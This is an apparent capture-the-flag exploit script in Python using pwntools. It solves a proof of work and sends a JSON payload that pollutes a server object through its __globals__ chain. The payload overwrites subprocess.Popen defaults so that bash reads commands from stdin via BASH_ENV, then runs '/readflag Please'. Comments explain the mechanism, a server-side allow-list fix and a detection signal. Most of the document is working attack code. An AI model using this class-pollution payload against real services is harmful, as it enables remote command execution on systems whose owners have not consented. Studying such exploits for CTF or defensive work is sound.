from pwn import *
import socket
import json
import ppp
import secrets
import tqdm
# Replacement positional defaults for subprocess.Popen.__init__, listed in
# signature order (CPython 3 layout as far as I know it; confirm against the
# interpreter the service runs). Only `executable` and `env` differ from the
# stock values; pass_fds is [] rather than () because JSON has no tuple type.
popen_defaults = [
    -1,                                # bufsize
    "/bin/bash",                       # executable (stock: None)
    None,                              # stdin
    None,                              # stdout
    None,                              # stderr
    None,                              # preexec_fn
    True,                              # close_fds
    False,                             # shell
    None,                              # cwd
    {"BASH_ENV":"/proc/self/fd/0"},    # env (stock: None)
    None,                              # universal_newlines
    None,                              # startupinfo
    0,                                 # creationflags
    True,                              # restore_signals
    False,                             # start_new_session
    [],                                # pass_fds
]

# Proof of work: draw (nonce, data) pairs until the local `ppp` module accepts
# one. `ppp` is not shown on this page, so the acceptance rule is unknown here.
solved = False
for _ in tqdm.trange(50000000):
    nonce = ppp.generate_nonce()
    data = secrets.token_hex(16)
    if ppp.is_valid_proof(data, nonce):
        solved = True
        break
if not solved:
    raise Exception("oops")

# NOTE(review): `hashlib` is never imported by name in this file; presumably
# it arrives through `from pwn import *` -- confirm, or import it explicitly.
digest = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest()

# The first three keys are ordinary request fields. The "get_data" subtree is a
# chain of attribute names, not data. It only matters if the receiving service
# copies JSON keys onto a live object with a recursive getattr/setattr merge
# (server code is not shown; this is inferred from the payload shape). Such a
# merge lets request input walk method -> __func__ -> __globals__ -> the
# imported subprocess module -> Popen.__init__ and replace its __defaults__.
# Server-side fix: merge only into an allow-list of plain fields and reject any
# key beginning with "__". Request bodies carrying keys such as __globals__ or
# __defaults__ are a reliable detection signal.
obj = {
    "data": data,
    "nonce": nonce,
    "hash": digest,
    "get_data": {
        "__func__": {
            "__globals__": {
                "subprocess": {
                    "Popen": {"__init__": {"__defaults__": popen_defaults}},
                },
            },
        },
    },
}

payload = json.dumps(obj)

print("running")

conn = remote("ppp.insomnihack.ch", 12345)
# TCP_NODELAY turns off Nagle's algorithm so each line is sent without being
# held back for coalescing.
conn.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

print(conn.recvline())
# The JSON request goes first; the second line is presumably consumed through
# the BASH_ENV override above once the service spawns a child process.
for line in (payload, "/readflag Please"):
    conn.sendline(line)
# Half-close the socket so the remote end sees EOF on its input.
conn.shutdown('send')
conn.interactive()